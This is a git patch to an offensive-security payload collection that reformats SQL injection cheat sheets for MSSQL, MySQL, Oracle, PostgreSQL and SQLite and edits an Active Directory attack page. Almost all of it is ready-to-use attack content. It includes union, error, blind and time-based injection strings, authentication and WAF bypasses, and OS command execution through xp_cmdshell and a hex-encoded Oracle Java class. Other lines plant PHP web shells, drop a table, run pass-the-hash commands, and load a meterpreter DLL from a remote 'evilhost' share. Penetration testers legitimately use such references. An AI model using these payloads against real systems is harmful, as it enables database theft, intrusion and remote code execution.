From f1cb7ce50e7c6d2b3d48cd72576e3913fe1b3617 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 16 May 2018 23:33:14 +0200 Subject: [PATCH] SQL Cheatsheets - Refactoring part 1 --- .../Active Directory Attack.md | 9 ++-- SQL injection/MSSQL Injection.md | 32 ++++++----- SQL injection/MySQL Injection.md | 38 ++++++++----- SQL injection/OracleSQL Injection.md | 19 ++++--- SQL injection/PostgreSQL Injection.md | 14 ++++- SQL injection/README.md | 53 ++++++++++--------- SQL injection/SQLite Injection.md | 29 ++++++---- 7 files changed, 122 insertions(+), 72 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 9bcb1be..088e243 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -22,7 +22,7 @@ ## Tools -* [Impacket](https://github.com/CoreSecurity/impacket) +* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) * [Responder](https://github.com/SpiderLabs/Responder) * [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Ranger](https://github.com/funkandwagnalls/ranger) @@ -157,18 +157,21 @@ https://room362.com/post/2016/kerberoast-pt1/ ``` ### Pass-the-Hash -Note: the password can be replaced by a hash to execute a `pass the hash` attack. +The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. ```c use exploit/windows/smb/psexec set RHOST 10.2.0.3 set SMBUser jarrieta -set SMBPass nastyCutt3r +set SMBPass nastyCutt3r +// NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. +// NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) set PAYLOAD windows/meterpreter/bind_tcp run shell or with crackmapexec cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" +also works with net range : cme smb 10.2.0.2/24 ... or with psexec proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index 7711f11..c5b7be9 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -1,23 +1,23 @@ # MSSQL Injection ## MSSQL version -``` +```sql SELECT @@version ``` ## MSSQL database name -``` +```sql SELECT DB_NAME() ``` ## MSSQL List Databases -``` +```sql SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` ## MSSQL List Column -``` +```sql SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable @@ -25,7 +25,7 @@ SELECT table_catalog, column_name FROM information_schema.columns ``` ## MSSQL List Tables -``` +```sql SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable @@ -35,7 +35,7 @@ SELECT table_catalog, table_name FROM information_schema.columns ## MSSQL User Password -``` +```sql MSSQL 2000: SELECT name, password FROM master..sysxlogins SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) @@ -46,7 +46,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master. ``` ## MSSQL Error based -``` +```sql For integer inputs : convert(int,@@version) For integer inputs : cast((SELECT @@version) as int) @@ -56,7 +56,7 @@ For string inputs : ' + cast((SELECT @@version) as int) + ' ## MSSQL Blind based -``` +```sql SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) @@ -64,22 +64,30 @@ SELECT message FROM data WHERE row = 1 and message like 't%' ``` ## MSSQL Time based -``` +```sql ProductID=1;waitfor delay '0:0:10'-- ProductID=1);waitfor delay '0:0:10'-- ProductID=1';waitfor delay '0:0:10'-- ProductID=1');waitfor delay '0:0:10'-- ProductID=1));waitfor delay '0:0:10'-- + +IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: -- +``` + +## MSSQL Stacked Query +Use a semi-colon ";" to add another query +```sql +ProductID=1; DROP members-- ``` ## MSSQL Command execution -``` +```sql EXEC xp_cmdshell "net user"; EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:' EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1' ``` If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) -``` +```sql EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 @@ -87,7 +95,7 @@ RECONFIGURE ``` ## MSSQL Make user DBA (DB admin) -``` +```sql EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index d53eaa7..c0d56ca 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,8 +1,16 @@ # MYSQL Injection +## MySQL Comment +```sql +# MYSQL Comment +/* MYSQL Comment */ +/*! MYSQL Special SQL */ +/*!32302 10*/ Comment for MySQL version 3.23.02 +``` + ## Detect columns number Using a simple ORDER -``` +```sql order by 1 order by 2 order by 3 @@ -11,7 +19,7 @@ order by XXX ``` ## MySQL Union Based -``` +```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... @@ -19,13 +27,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` ## MySQL Error Based - Basic -``` +```sql (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` ## MYSQL Error Based - UpdateXML function -``` +```sql AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)-- @@ -34,13 +42,13 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F ``` Shorter to read: -``` +```sql ' and updatexml(null,concat(0x0a,version()),null)-- - ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - ``` ## MYSQL Error Based - Extractvalue function -``` +```sql AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- @@ -50,21 +58,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126) ## MYSQL Blind using a conditional statement TRUE: `if @@version starts with a 5`: -``` +```sql 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 Response: HTTP/1.1 500 Internal Server Error ``` False: `if @@version starts with a 4`: -``` +```sql 2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2 Response: HTTP/1.1 200 OK ``` ## MYSQL Blind with MAKE_SET -``` +```sql AND MAKE_SET(YOLO<(SELECT(length(version()))),1) AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# ``` ## MYSQL DROP SHELL -``` +```sql SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' diff --git a/SQL injection/OracleSQL Injection.md b/SQL injection/OracleSQL Injection.md index 0a76ee5..04ecce5 100644 --- a/SQL injection/OracleSQL Injection.md +++ b/SQL injection/OracleSQL Injection.md @@ -1,12 +1,12 @@ # Oracle SQL Injection ## Oracle SQL version -``` +```sql SELECT user FROM dual UNION SELECT * FROM v$version ``` ## Oracle SQL database name -``` +```sql SELECT global_name FROM global_name; SELECT name FROM V$DATABASE; SELECT instance_name FROM V$INSTANCE; @@ -14,18 +14,18 @@ SELECT SYS.DATABASE_NAME FROM DUAL; ``` ## Oracle SQL List Databases -``` +```sql SELECT DISTINCT owner FROM all_tables; ``` ## Oracle SQL List Column -``` +```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; ``` ## Oracle SQL List Tables -``` +```sql SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; @@ -52,10 +52,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | | First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | - +## Oracle SQL Time based +```sql +AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ +``` ## Oracle SQL Command execution -``` +```sql /* create Java class */ BEGIN EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; @@ -72,7 +75,7 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; ``` or (hex encoded) -``` +```sql /* create Java class */ SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index ad4d208..7e077be 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -1,9 +1,21 @@ # POSTGRESQL -##PostgreSQL Error Based - Basic +## PostgreSQL Comment +``` +-- +/**/ +``` + +## PostgreSQL Error Based - Basic ``` ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) +``` + +## PostgreSQL Time Based +``` +AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) +AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` \ No newline at end of file diff --git a/SQL injection/README.md b/SQL injection/README.md index 7654f2c..da25544 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,11 +1,20 @@ # SQL injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application +## Summary +* [Entry point detection](#) +* [DBMS Identification](#) +* [SQL injection using SQLmap](#) +* [Authentication bypass](#) +* [Polyglot injection](#) +* [Insert Statement - ON DUPLICATE KEY UPDATE](#) +* [WAF Bypass](#) + ## Entry point detection Detection of an SQL injection entry point Simple characters -``` +```sql ' %27 " @@ -19,13 +28,13 @@ Wildcard (*) ``` Multiple encoding -``` +```sql %%2727 %25%27 ``` Merging characters -``` +```sql `+HERP '||'DERP '+'herp @@ -51,7 +60,7 @@ transformed into U+0027 APOSTROPHE (') ``` ## DBMS Identification -``` +```c ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"], ["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], @@ -169,12 +178,14 @@ tamper=name_of_the_tamper |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| ## Authentication bypass -``` +```sql '-' ' ' '&' '^' '*' +' or 1=1 limit 1 -- -+ +'="or' ' or ''-' ' or '' ' ' or ''&' @@ -258,26 +269,15 @@ admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` -## Time based -``` -SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) comment: -- /**/ -MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 comment: # -- /*!30100 MySQL code*/ -MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME]) comment: # -- /*!30100 MySQL code*/ -MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) comment: # -- /*!30100 MySQL code*/ -Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ -PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) comment: -- /**/ -PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) comment: -- /**/ -SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: -- -``` ## Polyglot injection (multicontext) -``` +```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: -``` +```sql Inject using payload: attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- @@ -294,7 +294,7 @@ After this, we can simply authenticate with “admin@example.com” and the pass ## WAF Bypass No Space (%20) - bypass using whitespace alternatives -``` +```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- @@ -304,31 +304,31 @@ No Space (%20) - bypass using whitespace alternatives ``` No Whitespace - bypass using comments -``` +```sql ?id=1/*comment*/and/**/1=1/**/-- ``` No Whitespace - bypass using parenthesis -``` +```sql ?id=(1)and(1)=(1)-- ``` No Comma - bypass using OFFSET, FROM and JOIN -``` +```sql LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` Blacklist using keywords - bypass using uppercase/lowercase -``` +```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` Blacklist using keywords case insensitive - bypass using an equivalent operator -``` +```sql AND -> && OR -> || = -> LIKE,REGEXP, not < and not > @@ -337,7 +337,7 @@ WHERE -> HAVING ``` Information_schema.tables Alternative -``` +```sql select * from mysql.innodb_table_stats; +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes | @@ -358,7 +358,7 @@ mysql> show tables in dvwa; ``` Version Alternative -``` +```sql mysql> select @@innodb_version; +------------------+ | @@innodb_version | @@ -400,6 +400,7 @@ mysql> mysql> select version(); * POSTGRESQL: - [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) * Others + - [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) - [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index 6285dc1..9629246 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -1,50 +1,61 @@ # SQLite Injection -## SQLite version +## SQLite comment +```sql +-- +/**/ ``` + +## SQLite version +```sql select sqlite_version(); ``` ## Integer/String based - Extract table name -``` +```sql SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ``` Use limit X+1 offset X, to extract all tables. ## Integer/String based - Extract column name -``` +```sql SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' ``` For a clean output -``` +```sql SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' ``` ## Boolean - Count number of tables -``` +```sql and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table ``` ## Boolean - Enumerating table name -``` +```sql and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number ``` ## Boolean - Extract info -``` +```sql and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') ``` -## Remote Command Execution using SQLite command - Attach Database +## Time based +```sql +AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) ``` + +## Remote Command Execution using SQLite command - Attach Database +```sql ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('');-- ``` ## Remote Command Execution using SQLite command - Load_extension -``` +```sql UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- ``` Note: By default this component is disabled